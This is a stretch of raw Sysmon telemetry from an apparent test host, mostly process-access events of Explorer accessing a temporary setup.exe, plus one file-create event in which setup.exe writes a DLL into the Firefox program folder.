13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-private-l1-1-0.dll2021-01-18 13:59:52.208 10341000x800000000000000014459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\